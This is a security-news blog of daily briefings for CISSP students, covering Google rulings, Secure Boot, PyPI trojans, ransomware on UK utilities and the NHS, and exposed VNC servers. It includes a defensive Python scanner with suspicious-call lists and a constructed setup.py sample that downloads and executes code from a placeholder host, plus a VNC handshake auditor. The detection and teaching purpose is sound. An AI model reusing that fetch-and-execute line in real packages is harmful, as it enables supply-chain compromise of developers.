Site blog

by Les Bell - Wednesday, August 17, 2022, 5:56 PM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Google Wins One, Loses One

Last year, the Australian Competition and Consumer Commission found that Google breached Australian consumer law during 2017 and 2018 by telling Android users that the only Google account setting they needed to change in order to stop the search giant collecting PII location data was the 'Location History' setting. Unfortunately, another Google account setting, 'Web & App Activity', also needed to be turned off - and it was turned on by default.

Now the Federal Court has ordered Google to pay $60 million in penalties for this breach. Fortunately for Google, the offence occurred before the maximum penalty for breaches of Australian consumer law was increased; from November 2018 the maximum became the higher of $10 million, three times the benefit obtained from the alleged conduct or, otherwise, 10% of turnover.

On the other hand, in an appeal to the High Court, Google's argument that a search engine is not a publisher was successful. The High Court overturned two previous rulings that Google was a publisher and, by refusing to take down a link, was guilty of defaming a Melbourne lawyer. Google's argument was that a hyperlink only communicates that something exists or where it exists, and that it is the operator of the web page who communicates the content to the user. In a majority ruling, the High Court agreed: "The provision of a hyperlink in the Search Result merely facilitated access to the ... article and was not an act of participation in the bilateral process of communicating the contents of that article to a third party".

ACCC Media Team, Google LLC to pay $60 million for misleading representations, media release, 12 August 2022. Available online at https://www.accc.gov.au/media-release/google-llc-to-pay-60-million-for-misleading-representations.

Byrne, Elizabeth, High Court finds Google is not a publisher in crucial win for search engine, ABC News, 17 August 2022. Available online at https://www.abc.net.au/news/2022-08-17/high-court-decision-google-not-publisher-george-defteros/101340622.

Secure Boot Loader Causes More Problems

We previously wrote about problems with the Windows secure boot process being subverted by some vendors' code. Unfortunately, it seems the cure is worse than the disease, for some users at least.

Last week's patch, KB5012170, added the signatures of the vendors' files to the Secure Boot Forbidden Signature database, which contains the UEFI revocation list. However, systems which do not have a valid bootloader will generate a 0x800f0922 error and fail to install the patch - fortunate for the user, as the system would not boot if the patch was applied.

Other users are reporting that after the patch is applied, Windows 11 PCs are booting to a BitLocker recovery screen - not a problem if the user has the recovery key, but unfortunately they almost never do. In well-managed environments, a domain administrator can recover the key from Active Directory Domain Services.

Windows 10 users are reporting other problems - slow boot times or their RAID mode being changed to AHCI in the firmware settings, triggering a Blue Screen of Death.

Speed, Richard, Microsoft's Secure Boot fix sends some PCs into BitLocker Recovery, The Register, 15 August 2022. Available online at https://www.theregister.com/2022/08/15/bitlocker_microsoft/.

Millions of Realtek-based Network Devices Vulnerable

Researchers from Argentinian company Faraday Security have demonstrated proof-of-concept code to exploit a vulnerability they discovered in the Realtek RTL819x system-on-a-chip (SoC). This chip is used in millions of networking devices such as routers.

Ilascu, Ionut, Exploit out for critical Realtek flaw affecting many networking devices, Bleeping Computer, 16 August 2022. Available online at https://www.bleepingcomputer.com/news/security/exploit-out-for-critical-realtek-flaw-affecting-many-networking-devices/.

Equifax Fallout Continues; SEC Charges Three

We have written previously about security governance requirements, and in particular the guidance issued by the SEC in February 2018, which seemed to have been triggered by its investigation of the infamous Equifax breach. The same incident continues to have repercussions, this time for a finance manager who worked at the public relations firm engaged by Equifax to assist with the breach, as well as her husband and his brother. The SEC alleges that upon learning of the breach, Ann M. Dishinger tipped off her husband, who arranged with a former business client to buy put options on Equifax on the understanding that they would split any profits realized. The SEC also alleges that he helped his brother set up a similar arrangement with an old high school friend. These arrangements allegedly netted approximately US$108,000 in profits, split between the participants.

U.S. Securities and Exchange Commission, SEC Charges Three Chicago-Area Residents with Insider Trading Around Equifax Data Breach Announcement, Litigation Release No. 25470, 16 August 2022. Available online at https://www.sec.gov/litigation/litreleases/2022/lr25470.htm.


These news brief blog articles are collected at https://www.lesbell.com.au/classroom/blog/index.php?courseid=1. If you would prefer an RSS feed for your reader, the feed can be found at https://www.lesbell.com.au/classroom/rss/file.php/1/dd977d83ae51998b0b79799c822ac0a1/blog/user/3/rss.xml.

Copyright to linked articles is held by their individual authors or publishers. Our commentary is licensed under a Creative Commons Attribution-ShareAlike 4.0 International License.

[ Modified: Wednesday, August 17, 2022, 8:10 PM ]
 
by Les Bell - Wednesday, August 17, 2022, 9:30 AM


News Stories


(ISC)² Election Process Criticised

As mentioned in a previous news brief, the election for the Board of Directors at (ISC)² continues to draw criticism from members. In a post to the (ISC)² Community discussion board, member Stephen Mencik, along with Wim Remes and Diana Contesti, point out some glaring flaws in the process:

  • The Board apparently changed the process for nomination after the election was announced.
  • This change was not announced to the membership.
  • Nevertheless, 85 people submitted nominations to run, but
  • The Board reviewed these nominations, and then selected five candidates to run for the five open seats.

In effect, says Mencik, this means that the Board decided the election result with no reference to the membership. Concerned certification holders (are we really members?) might want to have their say.

Mencik, Stephen, post in thread "Petition to be on the ballot for the 2022 ISC2 Board of Directors Election", (ISC)2 Community discussion board, 16 August 2022. Available online at https://community.isc2.org/t5/Welcome/Petition-to-be-on-the-Ballot-for-the-2022-ISC2-Board-of/m-p/52476/highlight/true#M2084.

Ransomware Operators Hit UK Water Supplier

A ransomware group known as Clop claimed to have hit the largest UK water supplier, Thames Water. In response, Thames Water issued a statement via its website stating that it had not suffered a cyber-attack; instead, South Staffordshire PLC, operator of South Staffs Water and Cambridge Water, confirmed that it had been the victim of the attack. The company revealed that its corporate network had been affected, but that its water supply operations were not compromised.

Despite Clop's misfire, this is continuing evidence that ransomware gangs are keen to exploit critical infrastructure operations, further eroding resilience at a time of drought and water shortages.

Montalbano, Elizabeth, U.K. Water Supplier Hit with Clop Ransomware Attack, ThreatPost, 16 August 2022. Available online at https://threatpost.com/water-supplier-hit-clop-ransomware/180422/.

PyPI Supply-Chain Attacks - Python Packages Target Discord, Roblox

Kaspersky, Snyk and Check Point have found multiple trojaned Python packages in PyPI, the Python Package Index repository. The trojan code uses a variety of techniques; for example, a package examined by Check Point used code in the __init__.py file invoked by the setup script to download and run a script which would search for and exfiltrate local passwords.

The latest discoveries include 12 distinct pieces of malware belonging to the same actor, which use PyInstaller to bundle a malicious application and its dependencies into one package that is then distributed via the Discord content delivery network, from where it infiltrates user browsers. It then exfiltrates passwords, cookies, web history and other data which the attackers can use to pivot to other targets using the stolen credentials.

The references below provide a lot of technical detail, but the overall message is that even more effort is required in the area of supply chain security.
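The install-time download-and-execute pattern described above is something a package reviewer can triage statically before a package is ever installed. The following is an added example (not code from the original post, nor from Kaspersky, Snyk or Check Point) that walks the AST of a setup.py or __init__.py and flags calls which fetch, decode or execute code; the two sample sources are constructed and the URL in the malicious one is a placeholder.

```python
"""Static triage of install-time Python code (setup.py, __init__.py).

Added example; uses only the standard library. It flags the pattern the
news item describes: code that runs at install time, fetches something
over the network and then executes it.
"""
import ast
from dataclasses import dataclass
from typing import List, Optional, Set

# Suspicious calls, grouped by what they do. A name matches if the dotted
# name written in the source ends with one of these patterns, so that
# "urllib.request.urlopen" matches "urlopen" and "requests.get" matches itself.
NETWORK_CALLS = {"urlopen", "urlretrieve", "requests.get", "requests.post"}
EXEC_CALLS = {"exec", "eval", "os.system", "subprocess.run",
              "subprocess.Popen", "subprocess.call", "subprocess.check_output"}
OBFUSCATION_CALLS = {"base64.b64decode", "codecs.decode", "zlib.decompress",
                     "marshal.loads"}


@dataclass
class Finding:
    line: int
    kind: str   # "network", "exec" or "obfuscation"
    call: str   # dotted name exactly as written in the source


def _dotted_name(node: ast.AST) -> Optional[str]:
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _matches(name: str, patterns: Set[str]) -> bool:
    segments = name.split(".")
    return any(".".join(segments[i:]) in patterns for i in range(len(segments)))


def scan_source(source: str) -> List[Finding]:
    """Collect every suspicious call in the source, with its line number."""
    findings: List[Finding] = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted_name(node.func)
        if name is None:
            continue
        for kind, patterns in (("network", NETWORK_CALLS),
                               ("exec", EXEC_CALLS),
                               ("obfuscation", OBFUSCATION_CALLS)):
            if _matches(name, patterns):
                findings.append(Finding(node.lineno, kind, name))
    return findings


def verdict(findings: List[Finding]) -> str:
    """'critical' if the code both fetches and executes, 'suspicious' if it
    does any one of the flagged things, otherwise 'clean'."""
    kinds = {f.kind for f in findings}
    if "network" in kinds and "exec" in kinds:
        return "critical"
    return "suspicious" if kinds else "clean"


# Constructed samples for illustration. The URL is a placeholder, not a real host.
MALICIOUS_SETUP = '''\
from setuptools import setup
from urllib.request import urlopen
# second stage fetched and executed during "pip install" (constructed pattern)
exec(urlopen("https://example.invalid/stage2.py").read())
setup(name="totally-fine", version="1.0")
'''

BENIGN_SETUP = '''\
from setuptools import setup
setup(name="totally-fine", version="1.0", packages=["totally_fine"])
'''

if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        found = scan_source(src)
        print(label, verdict(found), [(f.line, f.kind, f.call) for f in found])
```

Run it against a package's setup.py and any __init__.py it imports at build time; a "critical" verdict is a reason to read the code by hand, not proof of malice, since legitimate installers occasionally download build artefacts.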

Bezvershenko, Leonid and Igor Kuznetsov, Two more malicious Python packages in the PyPI, Kaspersky SecureList, 16 August 2022. Available online at https://securelist.com/two-more-malicious-python-packages-in-the-pypi/107218/.

Suero, Kyle and Raul Onitza-Klugman, Snyk finds PyPI malware that steals Discord and Roblox credential and payment info, Snyk blog, 16 August 2022. Available online at https://snyk.io/blog/pypi-malware-discord-roblox-credential-payment-info/.

Uncredited, CloudGuard Spectral detects several malicious packages on PyPI - the official software repository for Python developers, Check Point Research, 8 August 2022. Available online at https://research.checkpoint.com/2022/cloudguard-spectral-detects-several-malicious-packages-on-pypi-the-official-software-repository-for-python-developers/.

Another Hardware Vulnerability in AMD processors

In another brief, we mentioned the ÆPIC vulnerability which affects Intel's SGX security architecture. Now comes news of yet another hardware vulnerability, CVE-2021-46778, which impacts AMD Zen 1, Zen 2 and Zen 3 architecture processors. The SQUIP (Scheduler Queue Usage via Interference Probing) attack is a side channel attack that threat actors could use to recover RSA keys. AMD has issued a bulletin, but no easy fix is available.

Gast, Stefan, et al., SQUIP: Exploiting the Scheduler Queue Contention Side Channel, preprint, August 2022. Available online at https://stefangast.eu/papers/squip.pdf.

Uncredited, Execution Unit Scheduler Contention Side-Channel Vulnerability on AMD Processors, AMD product security bulletin, 12 August 2022. Available online at https://www.amd.com/en/corporate/product-security/bulletin/amd-sb-1039.

Russian APT Phishes Defence, Intelligence, Academics

Microsoft has been tracking an espionage campaign it labels SEABORGIUM, apparently involving an APT variously known as Callisto, COLDRIVER and TA446. The campaign targets defence and intelligence consulting firms, think tanks and academics, primarily in the US, UK, Nordic and Baltic states, and Eastern Europe, using phishing and credential theft techniques.

The campaign is highly targeted, using fake personas on social media to send innocuous emails and establish trust before sending a weaponized message containing or linking to a trojaned PDF file, which is hosted on Microsoft OneDrive.

Lakshmanan, Ravie, Microsoft Warns About Phishing Attacks by Russia-linked Hackers, The Hacker News, 16 August 2022. Available online at https://thehackernews.com/2022/08/microsoft-warns-about-phishing-attacks.html.

Aussie Roots Tractor

Continuing the Right-To-Repair debate, an Asia-based Australian security researcher showed DEF CON attendees how to get privileged access to the CAN bus display of a John Deere 4240 tractor. John Deere is much criticised for blocking access to its tractors' control systems, making repairs possible only via authorised dealers. It took researcher Sick Codes a lot of expensive experimentation to finally break the Linux-based display, but in the end it was embarrassingly easy: he simply created an empty file called dealerAuth.txt on a USB memory stick inserted into the system.

Saarinen, Juha, Oh Deere: Aussie researcher roots tractor control system, IT News, 16 August 2022. Available online at https://www.itnews.com.au/news/oh-deere-aussie-researcher-roots-tractor-control-system-584004.




[ Modified: Wednesday, August 17, 2022, 7:42 PM ]
 
by Les Bell - Tuesday, August 16, 2022, 8:49 AM


News Stories


Signal Users' Numbers Compromised By Twilio Breach

The Twilio breach a couple of weeks ago revealed the phone numbers of 1,900 Signal users, according to an advisory published by Signal. The Signal encrypted messaging app uses Twilio for phone number verification, and this is how the numbers were leaked. However, message history, contact lists, profile information and other data were not compromised.

Signal is contacting the affected users and prompting them to re-register the Signal app - this is necessary because it was possible for the attackers to register these phone numbers to another device using an SMS verification code revealed by the breach.

Uncredited, Twilio Incident: What Signal Users Need to Know, Signal Support, August 2022. Available online at https://support.signal.org/hc/en-us/articles/4850133017242.

Zoom Update Vulnerability Exposes Mac Users

A nasty vulnerability in the automatic update feature of the Zoom videoconferencing app for macOS could grant attackers root access, security researcher Patrick Wardle revealed at DEF CON on Saturday. Although initial installation of Zoom prompts for the user password, subsequent updates do not, because the updater runs as root. By feeding it a package with the right name, an attacker could either downgrade the Zoom version or even install a trojan, earning the vuln a CVSS score of 8.8.

This is the most recent of a long series of vulnerabilities in Zoom; the company has released a patch which fixes this vulnerability but users really should not rely on the auto-update process to install it.

Purdy, Kevin, Update Zoom for Mac now to avoid root-access vulnerability, Ars Technica, 16 August 2022. Available online at https://arstechnica.com/information-technology/2022/08/zoom-patches-mac-auto-updater-vulnerability-that-granted-root-access/.

Zoom Security Bulletin ZSB-22018, Local Privilege Escalation in Zoom Client for Meetings for macOS, Zoom Inc., 13 August 2022. Available online at https://explore.zoom.us/en/trust/security/security-bulletin/.

Credential Theft Still Popular - Especially Callback Phishing

A new report from Ponemon Institute says that 54% of security incidents were caused by credential theft, followed by ransomware and DDoS attacks, backing similar results in the Verizon Data Breach Investigations Report. One leading cause: almost 60% of organizations do not revoke credentials once they are no longer needed, and these unused and unmonitored accounts are easy prey for attackers.

But as user awareness is improving resistance to simple phishing attacks, spear-phishers are increasing their use of hybrid techniques such as barrel-phishing and callback phishing. A report from Agari claims that while phishing attacks have increased by only 6% since Q1 2021, callback phishing has increased by 625%.

Toulas, Bill, Callback phishing attacks see massive 625% growth since Q1 2021, Bleeping Computer, 15 August 2022. Available online at https://www.bleepingcomputer.com/news/security/callback-phishing-attacks-see-massive-625-percent-growth-since-q1-2021/.

Uncredited, Credential Theft Is (Still) A Top Attack Method, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/credential-theft-is-still-top-attack.html.

Uncredited, The State of Cybersecurity and Third-Party Remote Access Risk, SecureLink (sponsor), August 2022. Available online at https://www.securelink.com/research-reports/the-state-of-cybersecurity-and-third-party-remote-access-risk/ (registration required).

Android Banking Trojan Expands Capabilities and Reach

The SOVA (Russian for owl) banking trojan, which first appeared in September 2021, has continued to develop. The trojan uses the Accessibility Services feature of Android to overlay its own form fields over banking and shopping apps, and in its latest incarnation, SOVA v4, is able to intercept two-factor authentication codes and steal cookies. The operators have also expanded its targets from Spain and the US, where it was first seen, to Australia, Brazil, China, India, the Philippines and the UK.

Lakshmanan, Ravie, SOVA Android Banking Trojan Returns With New Capabilities and Targets, The Hacker News, 15 August 2022. Available online at https://thehackernews.com/2022/08/sova-android-banking-trojan-returns-new.html.




[ Modified: Tuesday, August 16, 2022, 8:58 AM ]
 
by Les Bell - Monday, August 15, 2022, 8:29 AM


News Stories


Microsoft Finally Reverses Advice on DogWalk

This story has been emerging for some time. Despite first claiming that the DogWalk vulnerability was not a security issue, Microsoft has now issued a patch for CVE-2022-34713 and is advising customers to install it as soon as possible. The patch was part of last week's Patch Tuesday (Wednesday in the Antipodes) update, so many users on an auto-update policy will already have installed it, but enterprise users may not yet have patched Windows Server systems.

The RCE vulnerability allows attackers to exploit the Microsoft Support Diagnostic Tool via either social engineering or phishing and has been known since January 2020, so this has been quite a long delay on Microsoft's part.

Trueman, Charlotte, Microsoft urges Windows users to run patch for DogWalk zero-day exploit, ComputerWorld, 11 August 2022. Available online at https://www.computerworld.com/article/3669434/microsoft-urges-windows-users-to-run-patch-for-dogwalk-zero-day-exploit.html.

Massive Ransomware Outage Hits UK NHS

A service provider to the UK's National Health Service has been hit by a targeted ransomware attack, shutting down or slowing access to patient records, the 111 telephone advice service and the out-of-hours appointment booking system for general practices. Some urgent treatment centres and mental health providers have also been affected.

At the time of writing, the National Cyber Security Centre and the Information Commissioner's Office are both working to investigate the attack on service provider Advanced, but have not identified who is behind the attack. Idle speculation suggests that it could be any of several groups who have spun off from the Conti gang, but there are many others who have specialised in healthcare attacks, including BlackCat, Quantum, Hive and AvosLocker.

Full restoration of services could take some weeks, as data must be restored, systems reconfigured and updated, additional controls possibly installed, and the remediation plans approved by NHS Digital. The repercussions are likely to continue for even longer, as patient data may well have been exfiltrated.

Thirty-six different healthcare trusts use Advanced's services; while the NHS is able to achieve economies of scale through this kind of arrangement, this breach illustrates the danger of putting so many eggs in one basket.

Milmo, Dan and Denis Campbell, Fears for patient data after ransomware attack on NHS software supplier, The Guardian, 11 August 2022. Available online at https://www.theguardian.com/society/2022/aug/11/fears-patient-data-ransomware-attack-nhs-software-supplier.

9,000 Machines Online With No Passwords

VNC (virtual network computing) is a popular cross-platform software tool for providing graphical remote access for system installation, configuration and management - it is used to install SUSE Linux Enterprise Server on IBM zSeries mainframes, for example, and is a popular alternative to using SSH to reach the command line for novice Linux system administrators.

Now security researchers at Cyble have discovered over 9,000 VNC endpoints which are not secured with a password, including SCADA and ICS systems such as water treatment plants, which could allow an attacker to remotely control pumps, causing all kinds of problems. While the systems are found all over the world, the largest number are found in China (perhaps unsurprising considering its size), with Sweden not far behind (surprising considering its size).
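Whether a VNC server will accept a connection with no password at all is visible in the first bytes it sends: after the ProtocolVersion exchange, an RFB 3.7/3.8 server lists the security types it offers, and type 1 is "None". The following is an added example (not from the original post or Cyble's research) that parses that handshake so an administrator can audit their own VNC endpoints from a captured or recorded exchange; the handshake bytes below are constructed, and the server-side behaviour follows RFC 6143 section 7.1.

```python
"""Parse the RFB (VNC) security handshake and report whether 'None' is offered.

Added example, standard library only. Feed it the ProtocolVersion banner and
the bytes the server sends next; it handles both the 3.3 form (a single U32
type chosen by the server) and the 3.7/3.8 form (a list the client picks from).
"""
import struct
from dataclasses import dataclass, field
from typing import List

# Security type numbers from RFC 6143 section 7.1.2 plus common registered values
SECURITY_TYPES = {
    0: "Invalid", 1: "None", 2: "VNC Authentication", 5: "RA2", 6: "RA2ne",
    16: "Tight", 18: "TLS", 19: "VeNCrypt", 30: "Apple Remote Desktop",
}


@dataclass
class Handshake:
    version: str                              # e.g. "003.008"
    offered: List[int] = field(default_factory=list)
    failure_reason: str = ""                  # set when the server refuses us

    @property
    def unauthenticated(self) -> bool:
        """True if a client may connect without any credential at all."""
        return 1 in self.offered

    def names(self) -> List[str]:
        return [SECURITY_TYPES.get(t, f"unknown({t})") for t in self.offered]


def parse_version(banner: bytes) -> str:
    """ProtocolVersion is exactly 12 bytes: 'RFB xxx.yyy\\n'."""
    if len(banner) < 12 or banner[:4] != b"RFB " or banner[11:12] != b"\n":
        raise ValueError("not an RFB ProtocolVersion message")
    return banner[4:11].decode("ascii")


def _reason(data: bytes) -> str:
    # U32 length followed by the reason string (sent only on failure)
    if len(data) < 4:
        return ""
    (n,) = struct.unpack("!I", data[:4])
    return data[4:4 + n].decode("latin-1", errors="replace")


def parse_security(version: str, payload: bytes) -> Handshake:
    major, minor = (int(x) for x in version.split("."))
    if (major, minor) < (3, 7):
        # RFB 3.3: the server decides; a single big-endian U32, 0 = failure
        if len(payload) < 4:
            raise ValueError("truncated 3.3 security type")
        (sec_type,) = struct.unpack("!I", payload[:4])
        if sec_type == 0:
            return Handshake(version, [], _reason(payload[4:]))
        return Handshake(version, [sec_type])
    # RFB 3.7/3.8: U8 count, then that many U8 types; count 0 = failure + reason
    if not payload:
        raise ValueError("empty security-types message")
    count = payload[0]
    if count == 0:
        return Handshake(version, [], _reason(payload[1:]))
    if len(payload) < 1 + count:
        raise ValueError("truncated security-type list")
    return Handshake(version, list(payload[1:1 + count]))


def classify(banner: bytes, payload: bytes) -> str:
    """'OPEN' if no password is needed, 'AUTH' if some credential is required,
    'REFUSED' if the server rejected the connection outright."""
    h = parse_security(parse_version(banner), payload)
    if h.failure_reason or not h.offered:
        return "REFUSED"
    return "OPEN" if h.unauthenticated else "AUTH"


# Constructed handshakes (banner, bytes that followed), not captured from real hosts
OPEN_38 = (b"RFB 003.008\n", b"\x01\x01")                 # offers only None
AUTH_38 = (b"RFB 003.008\n", b"\x02\x02\x13")             # VNC Auth or VeNCrypt
OPEN_33 = (b"RFB 003.003\n", struct.pack("!I", 1))        # 3.3 server picked None
REFUSED = (b"RFB 003.008\n", b"\x00" + struct.pack("!I", 8) + b"Too many")

if __name__ == "__main__":
    for label, (banner, rest) in {"open_38": OPEN_38, "auth_38": AUTH_38,
                                  "open_33": OPEN_33, "refused": REFUSED}.items():
        print(label, classify(banner, rest),
              parse_security(parse_version(banner), rest).names())
```

A server that offers type 1 alongside stronger types is still exposed, because the client chooses; the only safe outcome in an audit is "AUTH" with no "None" in the offered list.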

Toulas, Bill, Over 9,000 VNC servers exposed online without a password, Bleeping Computer, 14 August 2022. Available online at https://www.bleepingcomputer.com/news/security/over-9-000-vnc-servers-exposed-online-without-a-password/.

Want to Program? Go Python

The August edition of the TIOBE Index, which charts the popularity of different programming languages, shows that Python has now definitively passed long-time leaders C and Java. Although C and C++ did gain popularity, primarily for systems programming where performance is the key criterion in language selection, the all-round capability of Python will probably see it retain the top spot for some time to come.

Because Python features a REPL (Read, Evaluate, Print, Loop) interface which allows interactive execution, it is quite easy to learn its basic features. However, it can also compile its code for efficiency, and so the language is used in everything from small Raspberry Pi-based embedded systems through scripting applications for systems administration and reporting to scientific computing, data analysis and machine learning.

If asked to recommend which language security professionals should pick up for occasional use, the answer would have to be Python.

Other security-related language movements include the continued growth of safe systems-programming language Rust and the first appearance of Google's new C-derived language, Carbon.

Uncredited, TIOBE Index for August 2022: Python going through the roof, TIOBE (The Importance of Being Earnest), August 2022. Available online at https://www.tiobe.com/tiobe-index/.




 
by Les Bell - Friday, August 12, 2022, 7:55 PM


News Stories


Companies Profit from Stolen Code

Macintosh malware researcher Patrick Wardle has found his code, released as open source, in a number of commercial products. As exhibit one, he cites a software tool he created back in 2016, called OverSight. The program monitors a Mac's microphone and webcam, to see whether any applications are accessing them without the knowledge of the owner (no surprise: a number were).

Several years later, Wardle was surprised to discover a number of commercial applications that were not only doing the same thing as OverSight, in a similar way, but also contained the same bugs. When he approached the three companies involved, they all acknowledged that his code had been used without his consent, and they all eventually paid for rights.

Although it is likely that employees used the code without their employers' knowledge, it does bring to light a risk we sometimes overlook, and emphasizes the need to educate developers on free and open source software licensing.

Faife, Corin, This Mac hacker's code is so good, corporations keep stealing it, The Verge, 11 August 2022. Available online at https://www.theverge.com/2022/8/11/23301130/patrick-wardle-mac-code-corporations-stealing-black-hat.

Meta's In-App Browsers Inject Code to Track You Outside Facebook

Security researcher Felix Krause has investigated the behaviour of the Facebook and Instagram apps' browser component, and discovered that the app could track every interaction with external websites viewed from within it. The app injects JavaScript code into every website it renders - the code doesn't currently track everything, but it could monitor every button clicked, every link, all text selections and even form inputs, including passwords.

Now, I was pretty sure that I'd set an option in the Facebook app for Android to turn off the in-app browser, and use the Chrome browser instead - but looking for it now, any such setting seems to be quite deeply buried. So I, for one, welcome our new surveillance capitalism overlords.

Krause, Felix, iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser, Felix Krause blog, 10 August 2022. Available online at https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser.

Signed Secure UEFI Boot Loaders Not Trustworthy

The whole point of the Secure Boot process is to preserve a chain of trust that starts with the system's TPM chip and ends with a guaranteed-unmodified operating system. However, it turns out that three hardware vendors were somehow shipping UEFI boot loaders, signed by Microsoft, which were willing to bypass the process and execute arbitrary, unsigned code. This would be the perfect way to install a rootkit, for example.

Fortunately, Microsoft's Patch Tuesday, earlier this week, saw updates shipped which fix the problem.

Lakshmanan, Ravie, Researchers Uncover UEFI Secure Boot Bypass in 3 Microsoft Signed Boot Loaders, The Hacker News, 12 August 2022. Available online at https://thehackernews.com/2022/08/researchers-uncover-uefi-secure-boot.html.

GitHub Proposes Adoption of Sigstore for npm

As more and more software distributors adopt cryptographic signing of the packages they distribute, GitHub has asked developers to comment on a proposal to adopt Sigstore for the Node Package Manager (npm), which distributes JavaScript packages for Node.js and related systems. Sigstore is an open-source project which operates public-key infrastructure both to sign packages and to verify signatures, something that is seen as essential to the integrity of the software supply chain.

Lemos, Robert, Software Supply Chain Chalks Up a Security Win With New Crypto Effort, Dark Reading, 13 August 2022. Available online at https://www.darkreading.com/application-security/software-supply-chain-chalks-up-security-win-with-crypto-effort.

Chinese Threat Actor Targets Linux, Mac IM Application

Chinese group APT 27 (variously known as Iron Tiger, Emissary Panda and LuckyMouse) is alleged to have deployed a JavaScript trojan in a popular instant messaging app called "MiMi". The trojaned app first identifies the OS platform of the victim system, then downloads a backdoor called rshell. This then exfiltrates system information to its C2 server and awaits commands to search for and upload files to the server.

Older versions of the trojanized "MiMi" app also targeted Windows systems. The campaign appears to be targeting Chinese expatriates, perhaps to monitor their activities in other countries. The same threat actor has previously conducted cyberespionage campaigns internationally, attacking defence, healthcare, energy and technology enterprises. They were among several groups exploiting the Microsoft Exchange ProxyLogon vulnerability last year.

Gatlan, Sergiu, Chinese hackers backdoor chat app with new Linux, macOS malware, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/chinese-hackers-backdoor-chat-app-with-new-linux-macos-malware/.

NSFW Section (It's Saturday)

Excremental Retribution Exposed

A web service which sent a box of animal faeces, along with a personalised message, to enemies of its customers (because surely nobody would do this to their friends?) has been exploited by a customer who discovered an SQL injection vulnerability and downloaded the service's entire database.

Unfortunately for ShitExpress (I couldn't avoid saying it in the end), this customer was pompompurin, the owner of the Breached.co forum - exactly the kind of person who would spot a vulnerability - who was planning to use the service to send some dung to a rival security researcher. Instead, he shared the contents of the database on the forum, revealing the motherlode of abusive messages.

The moral of the story: shit doesn't just happen.

Sharma, Ax, Anonymous poop gifting site hacked, customers exposed, Bleeping Computer, 12 August 2022. Available online at https://www.bleepingcomputer.com/news/security/anonymous-poop-gifting-site-hacked-customers-exposed/.


And that's it for this week!



[ Modified: Saturday, August 13, 2022, 9:54 AM ]
 
by Les Bell - Thursday, August 11, 2022, 9:04 PM

Welcome to today's daily briefing on security news relevant to our CISSP (and other) courses. Links within stories may lead to further details in the course notes of some of our courses, and will only be accessible if you are enrolled in the corresponding course - this is a shallow ploy to encourage ongoing study. However, each item ends with a link to the original source.

News Stories


Facebook Draws Ire of Privacy and Freedom of Choice Advocates

Facebook is being criticized for surrendering the private messages of a teenager and her mother who were planning to use (and did use) a pharmaceutical product to terminate a pregnancy. The teenager, her mother and a man who assisted with disposal of the fetus have been charged with a number of offences, following investigations by police in Madison County, Nebraska, who had obtained a warrant requiring disclosure of the contents of an electronic communication.

Police subsequently seized the girl's phone and computer and retrieved the body of the fetus, which had been stillborn. The circumstances of the case are not as clear-cut as pro-choice advocates might like - the abortion was performed at 28 weeks gestation, which could be a crime prior to the contentious recent changes brought about by the US Supreme Court - but it does illustrate the way in which more recent cases will be prosecuted, with the cooperation of tech service providers.

The problem here is not Facebook; no US-based company, or company that operates in the US, be it a social media company, an email service provider, a messaging company or a telco, has the power to resist a warrant or court order issued by a US court. Those who seek privacy protections are going to have to use international service providers and also make use of encryption.

Koebler, Jason and Anna Merlan, This Is the Data Facebook Gave Police to Prosecute a Teenager for Abortion, Vice Motherboard, 9 August 2022. Available online at https://www.vice.com/amp/en/article/n7zevd/this-is-the-data-facebook-gave-police-to-prosecute-a-teenager-for-abortion.

Snort Rule Snafu Snookers Office 365

A Snort rule update pushed to Cisco Meraki firewalls accidentally blocked access to Microsoft Office 365. The Snort rule, 1-60381, is commented, "Microsoft Windows IIS denial-of-service attempt" and blocked a number of IP addresses belonging to Microsoft. Disabling the rule restored access, and Cisco has now pushed out an update.

What can we say, but: measure twice and cut once.

GiacomoS, [RESOLVED] Microsoft vulnerability and IPS/SNORT, Meraki Community forum, 11 August 2022. Available online at https://community.meraki.com/t5/Meraki-Service-Notices/RESOLVED-Microsoft-vulnerability-and-IPS-SNORT/ba-p/156649.

Microsoft 365 Status, We're working with our firewall partners to investigate snort rule 1-60381, Twitter thread, 11 August 2022. Available online at https://twitter.com/MSFT365Status/status/1557435310874587136.

SIM Box Used to Blast Smishes

The Australian Federal Police arrested two men who had allegedly used a SIM box to send out hundreds of thousands of SMS phishing messages which linked to fake bank and telco sites in order to capture the victims' credentials. The AFP allege the pair had been targeting customers of the Commonwealth Bank of Australia, National Australia Bank and Telstra since 2018.

A SIM box can hold hundreds of SIM cards and can send hundreds of thousands of SMS messages per day.

Noyes, Jenny, Phishing fraudsters used SIM box to fleece hundreds of victims, police allege, Sydney Morning Herald, 11 August 2022. Available online at https://www.smh.com.au/national/nsw/phishing-fraudsters-used-sim-box-to-fleece-hundreds-of-victims-police-allege-20220811-p5b8xv.html.

Ethical Question: Should We Build Quantum Computers?

Quantum physicist Emma McKay, a PhD student at McGill University, is concerned about how people practice science and develop technology. In an interview with the American Physical Society, she expresses the controversial view that perhaps we should not build quantum computers at all. McKay points out that one of the main applications of quantum computers is the optimization of financial market trades - essentially, making the rich richer. Then there are the possible military applications of quantum computers.

On the other hand, quantum annealing - the type of quantum computer currently sold by Canadian company D-Wave - might have wide application in optimization problems. But, says McKay, this might simply be used to optimize traffic flows for single-occupant vehicles, when a better approach from an environmental and economic point of view might be to promote public transport as well as bicycling infrastructure.

Do you remember the Ten Commandments of the Computer Professionals for Social Responsibility? The 9th Commandment says, "Thou shalt think about the social consequences of the program you are writing or the system you are designing". And then remember Shakespeare: it is "more honoured in the breach than in the observance". A timely reminder.

